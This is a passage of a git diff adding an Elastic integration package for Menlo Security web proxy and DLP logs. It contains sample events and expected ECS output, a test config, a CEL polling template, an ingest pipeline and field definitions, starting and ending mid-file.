"9a98930c-439d-4a0b-81f0-f4228f8c523f", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.12.2" + }, + "data_stream": { + "dataset": "menlo.dlp", + "namespace": "ep", + "type": "logs" + }, + "ecs": { + "version": "8.11.0" + }, + "elastic_agent": { + "id": "9a98930c-439d-4a0b-81f0-f4228f8c523f", + "snapshot": false, + "version": "8.12.2" + }, + "event": { + "action": "block", + "agent_id_status": "verified", + "category": [ + "intrusion_detection", + "network" + ], + "created": "2020-03-09T17:17:22.227Z", + "dataset": "menlo.dlp", + "id": "a4c2161b3f81a287ec46d3c993a33f3b97ded5fd854fa184e7f50679303111ce", + "ingested": "2024-03-28T13:30:33Z", + "kind": "alert", + "outcome": "success", + "severity": 5 + }, + "file": { + "hash": { + "sha256": "fd1aee671d92aba0f9f0a8a6d5c6b843e09c8295ced9bb85e16d97360b4d7b3a" + }, + "name": "more_credit_cards.csv" + }, + "http": { + "request": { + "method": "GET" + } + }, + "input": { + "type": "cel" + }, + "menlo": { + "dlp": { + "alerted": "false", + "category": "Download Sites", + "ccl": { + "id": "CreditordebitcardnumbersGlobal", + "match_counts": 1, + "score": 1 + }, + "status": "dirty", + "stream_name": "/safefile-input/working_file", + "user_input": "false" + } + }, + "observer": { + "product": "MSIP", + "vendor": "Menlo Security", + "version": "2.0" + }, + "related": { + "hash": [ + "fd1aee671d92aba0f9f0a8a6d5c6b843e09c8295ced9bb85e16d97360b4d7b3a" + ], + "user": [ + "admin@menlosecurity.com" + ] + }, + "rule": { + "id": "1f3ef32c-ec62-42fb-8cad-e1fee3375099", + "name": "Credit card block rule" + }, + "tags": [ + "menlo", + "forwarded" + ], + "url": { + "domain": "tinynewupload.com", + "original": "http://tinynewupload.com/", + "path": "/", + "registered_domain": "tinynewupload.com", + "scheme": "http", + "top_level_domain": "com" + }, + "user": { + "name": "admin@menlosecurity.com" + } +} \ No newline at end of file diff --git a/packages/menlo/data_stream/web/_dev/test/pipeline/test-common-config.yml b/packages/menlo/data_stream/web/_dev/test/pipeline/test-common-config.yml new file mode 100644 index 00000000000..4da22641654 --- /dev/null +++ b/packages/menlo/data_stream/web/_dev/test/pipeline/test-common-config.yml @@ -0,0 +1,3 @@ +fields: + tags: + - preserve_original_event diff --git a/packages/menlo/data_stream/web/_dev/test/pipeline/test-web.log b/packages/menlo/data_stream/web/_dev/test/pipeline/test-web.log new file mode 100644 index 00000000000..52673314d72 --- /dev/null +++ b/packages/menlo/data_stream/web/_dev/test/pipeline/test-web.log @@ -0,0 +1,3 @@ +{"event":{"top_url":"http://elastic.co/","egress_country":"US","domain":"elastic.co","protocol":"http","risk_tally":"-1","is_iframe":"false","origin_ip":"192.168.1.1","has_password":"false","file_size":"NA","browser_and_version":"Chrome_119","user-agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36","egress_ip":"192.168.4.55","sandboxActivity":"NA","event_time":"2023-11-21T13:12:37.102000","full_session_id":"nLxXe_iU-1","dst":"192.168.1.1","filename":"NA","risk_score":"low","version":"2.0","pe_rulename":"Business and Economy Category","soph_dlp_ref":"NA","numSubfiles":"0","xff_ip":"NA","product":"MSIP","origin_country":"US","vendor":"Menlo Security","rendering_mode":"ACR1","inconsistent_domain":"false","x-client-country":"US","sandboxResult":"NA","request_type":"GET","fullScanResult":"NA","tab_id":"1","pe_reason":"a77757d5-d3be-47ab-9394-cfff5887ade4","categories":"Business and Economy","severity":"5","x-client-ip":"192.168.4.3","name":"page_request","url":"http://elastic.co/","region":"us-east-1c","userid":"example_user","magicName":"NA","pe_action":"isolate","ua_type":"supported_browser","content-type":"text/html; charset=UTF-8","response_code":"308"}} +{"event":{"top_url":"https://elastic.co/","egress_country":"US","domain":"elastic.co","protocol":"https","risk_tally":"-1","is_iframe":"false","origin_ip":"192.168.1.1","has_password":"false","file_size":"NA","browser_and_version":"Chrome_119","user-agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36","egress_ip":"192.168.4.55","sandboxActivity":"NA","event_time":"2023-11-21T13:12:37.132000","full_session_id":"nLxXe_iU-1","dst":"192.168.1.1","filename":"NA","risk_score":"low","version":"2.0","pe_rulename":"Business and Economy Category","soph_dlp_ref":"NA","numSubfiles":"0","xff_ip":"NA","product":"MSIP","origin_country":"US","vendor":"Menlo Security","rendering_mode":"ACR1","inconsistent_domain":"false","x-client-country":"US","sandboxResult":"NA","request_type":"GET","referer":"http://elastic.co/","fullScanResult":"NA","tab_id":"1","pe_reason":"a77757d5-d3be-47ab-9394-cfff5887ade4","categories":"Business and Economy","severity":"5","x-client-ip":"192.168.4.3","name":"page_request","url":"https://elastic.co/","region":"us-east-1c","userid":"example_user","magicName":"NA","pe_action":"isolate","ua_type":"supported_browser","response_code":"301"}} +{"event":{"top_url":"https://www.elastic.co/","egress_country":"US","domain":"www.elastic.co","protocol":"https","risk_tally":"-1","is_iframe":"false","origin_ip":"192.168.1.2","has_password":"false","file_size":"NA","browser_and_version":"Chrome_119","user-agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36","egress_ip":"192.168.4.55","sandboxActivity":"NA","event_time":"2023-11-21T13:12:37.207000","full_session_id":"nLxXe_iU-1","dst":"192.168.1.2","filename":"NA","risk_score":"low","version":"2.0","pe_rulename":"Business and Economy Category","soph_dlp_ref":"NA","numSubfiles":"0","xff_ip":"NA","product":"MSIP","origin_country":"US","vendor":"Menlo Security","rendering_mode":"ACR1","inconsistent_domain":"false","x-client-country":"US","sandboxResult":"NA","request_type":"GET","referer":"http://elastic.co/","fullScanResult":"NA","tab_id":"1","pe_reason":"a77757d5-d3be-47ab-9394-cfff5887ade4","categories":"Business and Economy","severity":"5","x-client-ip":"192.168.4.3","name":"page_request","url":"https://www.elastic.co/","region":"us-east-1c","userid":"example_user","magicName":"NA","pe_action":"isolate","ua_type":"supported_browser","content-type":"text/html; charset=utf-8","response_code":"200"}} diff --git a/packages/menlo/data_stream/web/_dev/test/pipeline/test-web.log-expected.json b/packages/menlo/data_stream/web/_dev/test/pipeline/test-web.log-expected.json new file mode 100644 index 00000000000..89633640691 --- /dev/null +++ b/packages/menlo/data_stream/web/_dev/test/pipeline/test-web.log-expected.json @@ -0,0 +1,381 @@ +{ + "expected": [ + { + "@timestamp": "2023-11-21T13:12:37.102Z", + "client": { + "geo": { + "country_iso_code": "US" + }, + "ip": "192.168.4.3" + }, + "cloud": { + "region": "us-east-1c" + }, + "destination": { + "geo": { + "country_iso_code": "US" + }, + "ip": "192.168.1.1" + }, + "dns": { + "answers": { + "data": [ + "192.168.1.1" + ] + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "isolate", + "category": [ + "web", + "network", + "threat" + ], + "id": "nLxXe_iU-1", + "kind": "alert", + "original": "{\"event\":{\"top_url\":\"http://elastic.co/\",\"egress_country\":\"US\",\"domain\":\"elastic.co\",\"protocol\":\"http\",\"risk_tally\":\"-1\",\"is_iframe\":\"false\",\"origin_ip\":\"192.168.1.1\",\"has_password\":\"false\",\"file_size\":\"NA\",\"browser_and_version\":\"Chrome_119\",\"user-agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36\",\"egress_ip\":\"192.168.4.55\",\"sandboxActivity\":\"NA\",\"event_time\":\"2023-11-21T13:12:37.102000\",\"full_session_id\":\"nLxXe_iU-1\",\"dst\":\"192.168.1.1\",\"filename\":\"NA\",\"risk_score\":\"low\",\"version\":\"2.0\",\"pe_rulename\":\"Business and Economy Category\",\"soph_dlp_ref\":\"NA\",\"numSubfiles\":\"0\",\"xff_ip\":\"NA\",\"product\":\"MSIP\",\"origin_country\":\"US\",\"vendor\":\"Menlo Security\",\"rendering_mode\":\"ACR1\",\"inconsistent_domain\":\"false\",\"x-client-country\":\"US\",\"sandboxResult\":\"NA\",\"request_type\":\"GET\",\"fullScanResult\":\"NA\",\"tab_id\":\"1\",\"pe_reason\":\"a77757d5-d3be-47ab-9394-cfff5887ade4\",\"categories\":\"Business and Economy\",\"severity\":\"5\",\"x-client-ip\":\"192.168.4.3\",\"name\":\"page_request\",\"url\":\"http://elastic.co/\",\"region\":\"us-east-1c\",\"userid\":\"example_user\",\"magicName\":\"NA\",\"pe_action\":\"isolate\",\"ua_type\":\"supported_browser\",\"content-type\":\"text/html; charset=UTF-8\",\"response_code\":\"308\"}}", + "outcome": "failure", + "reason": "a77757d5-d3be-47ab-9394-cfff5887ade4", + "severity": 5 + }, + "http": { + "request": { + "method": "GET" + }, + "response": { + "status_code": 308 + } + }, + "menlo": { + "web": { + "categories": "Business and Economy", + "content_type": "text/html; charset=UTF-8", + "has_password": false, + "is_iframe": "false", + "request_type": "page_request", + "risk_score": "low", + "tab_id": "1", + "tally": -1, + "ua_type": "supported_browser" + } + }, + "network": { + "protocol": "http" + }, + "observer": { + "geo": { + "country_iso_code": "US" + }, + "ip": [ + "192.168.4.55" + ], + "product": "MSIP", + "vendor": "Menlo Security", + "version": "2.0" + }, + "related": { + "ip": [ + "192.168.4.3", + "192.168.1.1" + ], + "user": [ + "example_user" + ] + }, + "server": { + "geo": { + "country_iso_code": "US" + }, + "ip": "192.168.1.1" + }, + "source": { + "geo": { + "country_iso_code": "US" + }, + "ip": "192.168.4.3" + }, + "tags": [ + "preserve_original_event" + ], + "url": { + "domain": "elastic.co", + "original": "http://elastic.co/", + "path": "/", + "registered_domain": "elastic.co", + "scheme": "http", + "top_level_domain": "co" + }, + "user": { + "name": "example_user" + }, + "user_agent": { + "device": { + "name": "Mac" + }, + "name": "Chrome", + "original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36", + "os": { + "full": "Mac OS X 10.15.7", + "name": "Mac OS X", + "version": "10.15.7" + }, + "version": "119.0.0.0" + } + }, + { + "@timestamp": "2023-11-21T13:12:37.132Z", + "client": { + "geo": { + "country_iso_code": "US" + }, + "ip": "192.168.4.3" + }, + "cloud": { + "region": "us-east-1c" + }, + "destination": { + "geo": { + "country_iso_code": "US" + }, + "ip": "192.168.1.1" + }, + "dns": { + "answers": { + "data": [ + "192.168.1.1" + ] + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "isolate", + "category": [ + "web", + "network", + "threat" + ], + "id": "nLxXe_iU-1", + "kind": "alert", + "original": "{\"event\":{\"top_url\":\"https://elastic.co/\",\"egress_country\":\"US\",\"domain\":\"elastic.co\",\"protocol\":\"https\",\"risk_tally\":\"-1\",\"is_iframe\":\"false\",\"origin_ip\":\"192.168.1.1\",\"has_password\":\"false\",\"file_size\":\"NA\",\"browser_and_version\":\"Chrome_119\",\"user-agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36\",\"egress_ip\":\"192.168.4.55\",\"sandboxActivity\":\"NA\",\"event_time\":\"2023-11-21T13:12:37.132000\",\"full_session_id\":\"nLxXe_iU-1\",\"dst\":\"192.168.1.1\",\"filename\":\"NA\",\"risk_score\":\"low\",\"version\":\"2.0\",\"pe_rulename\":\"Business and Economy Category\",\"soph_dlp_ref\":\"NA\",\"numSubfiles\":\"0\",\"xff_ip\":\"NA\",\"product\":\"MSIP\",\"origin_country\":\"US\",\"vendor\":\"Menlo Security\",\"rendering_mode\":\"ACR1\",\"inconsistent_domain\":\"false\",\"x-client-country\":\"US\",\"sandboxResult\":\"NA\",\"request_type\":\"GET\",\"referer\":\"http://elastic.co/\",\"fullScanResult\":\"NA\",\"tab_id\":\"1\",\"pe_reason\":\"a77757d5-d3be-47ab-9394-cfff5887ade4\",\"categories\":\"Business and Economy\",\"severity\":\"5\",\"x-client-ip\":\"192.168.4.3\",\"name\":\"page_request\",\"url\":\"https://elastic.co/\",\"region\":\"us-east-1c\",\"userid\":\"example_user\",\"magicName\":\"NA\",\"pe_action\":\"isolate\",\"ua_type\":\"supported_browser\",\"response_code\":\"301\"}}", + "outcome": "failure", + "reason": "a77757d5-d3be-47ab-9394-cfff5887ade4", + "severity": 5 + }, + "http": { + "request": { + "method": "GET", + "referrer": "http://elastic.co/" + }, + "response": { + "status_code": 301 + } + }, + "menlo": { + "web": { + "categories": "Business and Economy", + "has_password": false, + "is_iframe": "false", + "request_type": "page_request", + "risk_score": "low", + "tab_id": "1", + "tally": -1, + "ua_type": "supported_browser" + } + }, + "network": { + "protocol": "https" + }, + "observer": { + "geo": { + "country_iso_code": "US" + }, + "ip": [ + "192.168.4.55" + ], + "product": "MSIP", + "vendor": "Menlo Security", + "version": "2.0" + }, + "related": { + "ip": [ + "192.168.4.3", + "192.168.1.1" + ], + "user": [ + "example_user" + ] + }, + "server": { + "geo": { + "country_iso_code": "US" + }, + "ip": "192.168.1.1" + }, + "source": { + "geo": { + "country_iso_code": "US" + }, + "ip": "192.168.4.3" + }, + "tags": [ + "preserve_original_event" + ], + "url": { + "domain": "elastic.co", + "original": "https://elastic.co/", + "path": "/", + "registered_domain": "elastic.co", + "scheme": "https", + "top_level_domain": "co" + }, + "user": { + "name": "example_user" + }, + "user_agent": { + "device": { + "name": "Mac" + }, + "name": "Chrome", + "original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36", + "os": { + "full": "Mac OS X 10.15.7", + "name": "Mac OS X", + "version": "10.15.7" + }, + "version": "119.0.0.0" + } + }, + { + "@timestamp": "2023-11-21T13:12:37.207Z", + "client": { + "geo": { + "country_iso_code": "US" + }, + "ip": "192.168.4.3" + }, + "cloud": { + "region": "us-east-1c" + }, + "destination": { + "geo": { + "country_iso_code": "US" + }, + "ip": "192.168.1.2" + }, + "dns": { + "answers": { + "data": [ + "192.168.1.2" + ] + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "isolate", + "category": [ + "web", + "network", + "threat" + ], + "id": "nLxXe_iU-1", + "kind": "alert", + "original": "{\"event\":{\"top_url\":\"https://www.elastic.co/\",\"egress_country\":\"US\",\"domain\":\"www.elastic.co\",\"protocol\":\"https\",\"risk_tally\":\"-1\",\"is_iframe\":\"false\",\"origin_ip\":\"192.168.1.2\",\"has_password\":\"false\",\"file_size\":\"NA\",\"browser_and_version\":\"Chrome_119\",\"user-agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36\",\"egress_ip\":\"192.168.4.55\",\"sandboxActivity\":\"NA\",\"event_time\":\"2023-11-21T13:12:37.207000\",\"full_session_id\":\"nLxXe_iU-1\",\"dst\":\"192.168.1.2\",\"filename\":\"NA\",\"risk_score\":\"low\",\"version\":\"2.0\",\"pe_rulename\":\"Business and Economy Category\",\"soph_dlp_ref\":\"NA\",\"numSubfiles\":\"0\",\"xff_ip\":\"NA\",\"product\":\"MSIP\",\"origin_country\":\"US\",\"vendor\":\"Menlo Security\",\"rendering_mode\":\"ACR1\",\"inconsistent_domain\":\"false\",\"x-client-country\":\"US\",\"sandboxResult\":\"NA\",\"request_type\":\"GET\",\"referer\":\"http://elastic.co/\",\"fullScanResult\":\"NA\",\"tab_id\":\"1\",\"pe_reason\":\"a77757d5-d3be-47ab-9394-cfff5887ade4\",\"categories\":\"Business and Economy\",\"severity\":\"5\",\"x-client-ip\":\"192.168.4.3\",\"name\":\"page_request\",\"url\":\"https://www.elastic.co/\",\"region\":\"us-east-1c\",\"userid\":\"example_user\",\"magicName\":\"NA\",\"pe_action\":\"isolate\",\"ua_type\":\"supported_browser\",\"content-type\":\"text/html; charset=utf-8\",\"response_code\":\"200\"}}", + "outcome": "failure", + "reason": "a77757d5-d3be-47ab-9394-cfff5887ade4", + "severity": 5 + }, + "http": { + "request": { + "method": "GET", + "referrer": "http://elastic.co/" + }, + "response": { + "status_code": 200 + } + }, + "menlo": { + "web": { + "categories": "Business and Economy", + "content_type": "text/html; charset=utf-8", + "has_password": false, + "is_iframe": "false", + "request_type": "page_request", + "risk_score": "low", + "tab_id": "1", + "tally": -1, + "ua_type": "supported_browser" + } + }, + "network": { + "protocol": "https" + }, + "observer": { + "geo": { + "country_iso_code": "US" + }, + "ip": [ + "192.168.4.55" + ], + "product": "MSIP", + "vendor": "Menlo Security", + "version": "2.0" + }, + "related": { + "ip": [ + "192.168.4.3", + "192.168.1.2" + ], + "user": [ + "example_user" + ] + }, + "server": { + "geo": { + "country_iso_code": "US" + }, + "ip": "192.168.1.2" + }, + "source": { + "geo": { + "country_iso_code": "US" + }, + "ip": "192.168.4.3" + }, + "tags": [ + "preserve_original_event" + ], + "url": { + "domain": "www.elastic.co", + "original": "https://www.elastic.co/", + "path": "/", + "registered_domain": "elastic.co", + "scheme": "https", + "subdomain": "www", + "top_level_domain": "co" + }, + "user": { + "name": "example_user" + }, + "user_agent": { + "device": { + "name": "Mac" + }, + "name": "Chrome", + "original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36", + "os": { + "full": "Mac OS X 10.15.7", + "name": "Mac OS X", + "version": "10.15.7" + }, + "version": "119.0.0.0" + } + } + ] +} \ No newline at end of file diff --git a/packages/menlo/data_stream/web/_dev/test/system/test-default-config.yml b/packages/menlo/data_stream/web/_dev/test/system/test-default-config.yml new file mode 100644 index 00000000000..cf8c52ab8b8 --- /dev/null +++ b/packages/menlo/data_stream/web/_dev/test/system/test-default-config.yml @@ -0,0 +1,11 @@ +input: cel +service: menlo +vars: + url: http://{{Hostname}}:{{Port}}/api/rep/v1/fetch/client_select + token: xxxx +data_stream: + vars: + batch_size: 2 + preserve_original_event: true +assert: + hit_count: 4 diff --git a/packages/menlo/data_stream/web/agent/stream/input.yml.hbs b/packages/menlo/data_stream/web/agent/stream/input.yml.hbs new file mode 100644 index 00000000000..632af803549 --- /dev/null +++ b/packages/menlo/data_stream/web/agent/stream/input.yml.hbs @@ -0,0 +1,80 @@ +config_version: 2 +interval: {{interval}} +{{#if enable_request_tracer}} +resource.tracer.filename: "../../logs/cel/http-request-trace-*.ndjson" +redact: + fields: + - token +resource.tracer.maxbackups: 5 +{{/if}} +{{#if proxy_url}} +resource.proxy_url: {{proxy_url}} +{{/if}} +{{#if ssl}} +resource.ssl: {{ssl}} +{{/if}} +{{#if http_client_timeout}} +resource.timeout: {{http_client_timeout}} +{{/if}} +resource.url: {{url}} +state: + batch_size: {{batch_size}} + initial_interval: {{initial_interval}} + token: {{token}} +program: | + post_request( + state.url + "?format=json" + "&limit=" + string(state.batch_size) + "&end=" + string(int(now())) + "&start=" + ( + has(state.cursor) && has(state.cursor.last_timestamp) && state.cursor.last_timestamp != null ? + string(int(state.cursor.last_timestamp.parse_time(time_layout.RFC3339))) + : + (string(int(now() - duration(state.initial_interval)))) + ), + "application/json", + {"token": state.token, "log_type": "web", "pagingIdentifiers": ( + has(state.cursor) && has(state.cursor.paging) && state.cursor.paging != null ? + state.cursor.paging + : + {} + ) + }.encode_json() + ).do_request().as(resp, bytes(resp.Body).decode_json().as(body, { + "events": body[0].result.events.map(e, { + "message": e.encode_json(), + }), + "url": state.url, + "batch_size": state.batch_size, + "token": state.token, + "cursor": { + "last_timestamp": ( + has(body[0].timestamp) && body[0].timestamp.size() > 0 + ? + body[0].timestamp.parse_time(time_layout.RFC3339) + : + null + ), + "paging": ( + has(body[0].result.pagingIdentifiers) && body[0].result.pagingIdentifiers.size() > 0 ? + body[0].result.pagingIdentifiers + : + null + ) + } + }) + ) +tags: +{{#if preserve_original_event}} + - preserve_original_event +{{/if}} +{{#if preserve_duplicate_custom_fields}} + - preserve_duplicate_custom_fields +{{/if}} +{{#each tags as |tag|}} + - {{tag}} +{{/each}} +{{#contains "forwarded" tags}} +publisher_pipeline.disable_host: true +{{/contains}} +{{#if processors}} +processors: +{{processors}} +{{/if}} diff --git a/packages/menlo/data_stream/web/elasticsearch/ingest_pipeline/default.yml b/packages/menlo/data_stream/web/elasticsearch/ingest_pipeline/default.yml new file mode 100644 index 00000000000..6da7be87255 --- /dev/null +++ b/packages/menlo/data_stream/web/elasticsearch/ingest_pipeline/default.yml @@ -0,0 +1,346 @@ +--- +description: Mapping of Menlo Web Proxy Fields from API into ECS fields. +processors: + - set: + field: ecs.version + value: 8.11.0 + - rename: + field: message + tag: rename_message_to_event_original + target_field: event.original + if: ctx.event?.original == null + ignore_missing: true + - set: + field: event.kind + value: alert + - json: + field: event.original + tag: 'json_decoding' + target_field: json + - date: + field: json.event.event_time + formats: + - ISO8601 + target_field: '@timestamp' + timezone: UTC + tag: date_timestamp_epoch + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: json.event.severity + type: long + target_field: event.severity + ignore_missing: true + - rename: + field: json.event.full_session_id + target_field: event.id + ignore_missing: true + - rename: + field: json.event.pe_action + target_field: event.action + ignore_missing: true + - set: + field: event.outcome + value: unknown + - set: + field: event.outcome + value: failure + if: ctx.event.action == 'block' || ctx.event.action == 'isolate' || ctx.event.action == 'ssl_exception' + - set: + field: event.outcome + value: success + if: ctx.event.action == 'direct' || ctx.event.action == 'allow' + - rename: + field: json.event.pe_reason + target_field: event.reason + ignore_missing: true + - set: + field: event.category + value: web + - append: + field: event.category + value: network + - append: + field: event.category + value: threat + - rename: + field: json.event.name + target_field: menlo.web.request_type + ignore_missing: true + - rename: + field: json.event.soph_dlp_ref + target_field: event.reference + if: ctx.json?.event?.soph_dlp_ref != "NA" + ignore_missing: true + - rename: + field: json.event.risk_score + target_field: menlo.web.risk_score + ignore_missing: true + - append: + field: dns.answers.data + value: '{{{json.event.dst}}}' + allow_duplicates: false + - rename: + field: json.event.product + target_field: observer.product + ignore_missing: true + - rename: + field: json.event.vendor + target_field: observer.vendor + ignore_missing: true + - convert: + field: json.event.risk_tally + type: long + target_field: menlo.web.tally + ignore_missing: true + - convert: + field: json.event.has_password + type: boolean + target_field: menlo.web.has_password + if: ctx?.json?.event?.has_password != "NA" + ignore_missing: true + - convert: + field: json.event.x-client-ip + type: ip + target_field: client.ip + ignore_missing: true + ignore_failure: true + - convert: + field: json.event.origin_ip + type: ip + target_field: server.ip + ignore_failure: true + - rename: + field: json.event.origin_country + target_field: server.geo.country_iso_code + ignore_failure: true + - rename: + field: json.event.x-client-country + target_field: client.geo.country_iso_code + ignore_failure: true + - rename: + field: json.event.egress_country + target_field: observer.geo.country_iso_code + ignore_missing: true + ignore_failure: true + - convert: + field: json.event.file_size + type: long + target_field: file.size + if: ctx.json?.event?.file_size != "NA" + ignore_missing: true + - append: + field: observer.ip + value: '{{{json.event.egress_ip}}}' + allow_duplicates: false + if: ctx.json?.event?.egress_ip != "NA" + - set: + field: destination + copy_from: server + ignore_empty_value: true + - set: + field: source + copy_from: client + - rename: + field: json.event.content-type + target_field: menlo.web.content_type + ignore_missing: true + - user_agent: + field: json.event.user-agent + ignore_missing: true + - rename: + field: json.event.request_type + target_field: http.request.method + ignore_missing: true + - rename: + field: json.event.ua_type + target_field: menlo.web.ua_type + ignore_missing: true + - rename: + field: json.event.version + target_field: observer.version + ignore_missing: true + - uri_parts: + field: json.event.url + keep_original: true + remove_if_successful: true + ignore_failure: true + - registered_domain: + field: url.domain + target_field: url + - rename: + field: json.event.referer + target_field: http.request.referrer + ignore_missing: true + - rename: + field: json.event.userid + target_field: user.name + ignore_missing: true + - append: + field: related.user + value: "{{{user.name}}}" + allow_duplicates: false + if: ctx.user?.name != null + - rename: + field: json.event.protocol + target_field: network.protocol + ignore_missing: true + - convert: + field: json.event.response_code + type: long + target_field: http.response.status_code + ignore_missing: true + - set: + copy_from: json.event.region + tag: set_cloud_region + field: cloud.region + ignore_empty_value: true + - rename: + field: json.event.filename + target_field: file.name + ignore_missing: true + if: ctx.json?.event?.filename != "NA" + - rename: + field: json.event.sha256 + target_field: file.hash.sha256 + ignore_missing: true + - append: + field: related.hash + value: "{{file.hash.sha256}}" + allow_duplicates: false + if: ctx.file?.hash?.sha256 != null + - rename: + field: json.event.categories + target_field: menlo.web.categories + - rename: + field: json.event.threats + target_field: menlo.web.threats + ignore_missing: true + - rename: + field: json.event.threat_types + target_field: menlo.web.threat_types + ignore_missing: true + - rename: + field: json.event.is_iframe + target_field: menlo.web.is_iframe + ignore_missing: true + - rename: + field: json.event.product + target_field: observer.product + ignore_missing: true + - rename: + field: json.event.protocol + target_field: network.protocol + ignore_missing: true + - rename: + field: json.event.cached + target_field: menlo.web.cached + ignore_missing: true + - rename: + field: json.event.casb_app_name + target_field: menlo.web.casb_app_name + ignore_missing: true + - rename: + field: json.event.casb_cat_name + target_field: menlo.web.casb_cat_name + ignore_missing: true + - rename: + field: json.event.casb_fun_name + target_field: menlo.web.casb_fun_name + ignore_missing: true + - rename: + field: json.event.casb_org_name + target_field: menlo.web.casb_org_name + ignore_missing: true + - rename: + field: json.event.casb_profile_id + target_field: menlo.web.casb_profile_id + ignore_missing: true + - rename: + field: json.event.casb_profile_name + target_field: menlo.web.casb_profile_name + ignore_missing: true + - rename: + field: json.event.casb_profile_type + target_field: menlo.web.casb_profile_type + ignore_missing: true + - rename: + field: json.event.casb_risk_score + target_field: menlo.web.casb_risk_score + ignore_missing: true + - rename: + field: json.event.sbox + target_field: menlo.web.sbox + ignore_missing: true + - rename: + field: json.event.sbox_mal_act + target_field: menlo.web.sbox_mal_act + ignore_missing: true + - rename: + field: json.event.soph + target_field: menlo.web.soph + ignore_missing: true + - rename: + field: json.event.tab_id + target_field: menlo.web.tab_id + ignore_missing: true + - rename: + field: json.event.virus_details + target_field: menlo.web.virus_details + ignore_missing: true + - rename: + field: json.event.xff_ip + target_field: menlo.web.xff_ip + ignore_missing: true + if: ctx?.json?.event?.xff_ip != "NA" + - append: + field: related.ip + value: '{{source.ip}}' + if: ctx.source?.ip != null + allow_duplicates: false + - append: + field: related.ip + value: '{{destination.ip}}' + if: ctx.destination?.ip != null + allow_duplicates: false + - remove: + field: json + tag: remove_json + ignore_missing: true + - remove: + field: event.original + tag: remove_event_original + ignore_missing: true + if: ctx.tags == null || !(ctx.tags.contains('preserve_original_event')) + - script: + tag: script_to_drop_null_values + lang: painless + description: Drops null/empty values recursively. + source: |- + boolean drop(Object o) { + if (o == null || o == '') { + return true; + } else if (o instanceof Map) { + ((Map) o).values().removeIf(v -> drop(v)); + return (((Map) o).size() == 0); + } else if (o instanceof List) { + ((List) o).removeIf(v -> drop(v)); + return (((List) o).length == 0); + } + return false; + } + drop(ctx); + - append: + field: event.kind + value: pipeline_error + allow_duplicates: false + if: ctx.error?.message != null +on_failure: + - set: + field: event.kind + value: pipeline_error + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' diff --git a/packages/menlo/data_stream/web/fields/agent.yml b/packages/menlo/data_stream/web/fields/agent.yml new file mode 100644 index 00000000000..98d2f9f38d5 --- /dev/null +++ b/packages/menlo/data_stream/web/fields/agent.yml @@ -0,0 +1,177 @@ +- name: cloud + title: Cloud + group: 2 + description: Fields related to the cloud or infrastructure the events are coming from. + footnote: 'Examples: If Metricbeat is running on an EC2 host and fetches data from its host, the cloud info contains the data about this machine. If Metricbeat runs on a remote machine outside the cloud and fetches data from a service running in the cloud, the field contains cloud data from the machine the service is running on.' + type: group + fields: + - name: account.id + level: extended + type: keyword + ignore_above: 1024 + description: 'The cloud account or organization id used to identify different entities in a multi-tenant environment. Examples: AWS account id, Google Cloud ORG Id, or other unique identifier.' + example: 666777888999 + - name: availability_zone + level: extended + type: keyword + ignore_above: 1024 + description: Availability zone in which this host is running. + example: us-east-1c + - name: instance.id + level: extended + type: keyword + ignore_above: 1024 + description: Instance ID of the host machine. + example: i-1234567890abcdef0 + - name: instance.name + level: extended + type: keyword + ignore_above: 1024 + description: Instance name of the host machine. + - name: machine.type + level: extended + type: keyword + ignore_above: 1024 + description: Machine type of the host machine. + example: t2.medium + - name: provider + level: extended + type: keyword + ignore_above: 1024 + description: Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. + example: aws + - name: region + level: extended + type: keyword + ignore_above: 1024 + description: Region in which this host is running. + example: us-east-1 + - name: project.id + type: keyword + description: Name of the project in Google Cloud. + - name: image.id + type: keyword + description: Image ID for the cloud instance. +- name: container + title: Container + group: 2 + description: 'Container fields are used for meta information about the specific container that is the source of information. These fields help correlate data based containers from any runtime.' + type: group + fields: + - name: id + level: core + type: keyword + ignore_above: 1024 + description: Unique container id. + - name: image.name + level: extended + type: keyword + ignore_above: 1024 + description: Name of the image the container was built on. + - name: labels + level: extended + type: object + object_type: keyword + description: Image labels. + - name: name + level: extended + type: keyword + ignore_above: 1024 + description: Container name. +- name: host + title: Host + group: 2 + description: 'A host is defined as a general computing instance. ECS host.* fields should be populated with details about the host on which the event happened, or from which the measurement was taken. Host types include hardware, virtual machines, Docker containers, and Kubernetes nodes.' + type: group + fields: + - name: architecture + level: core + type: keyword + ignore_above: 1024 + description: Operating system architecture. + example: x86_64 + - name: domain + level: extended + type: keyword + ignore_above: 1024 + description: 'Name of the domain of which the host is a 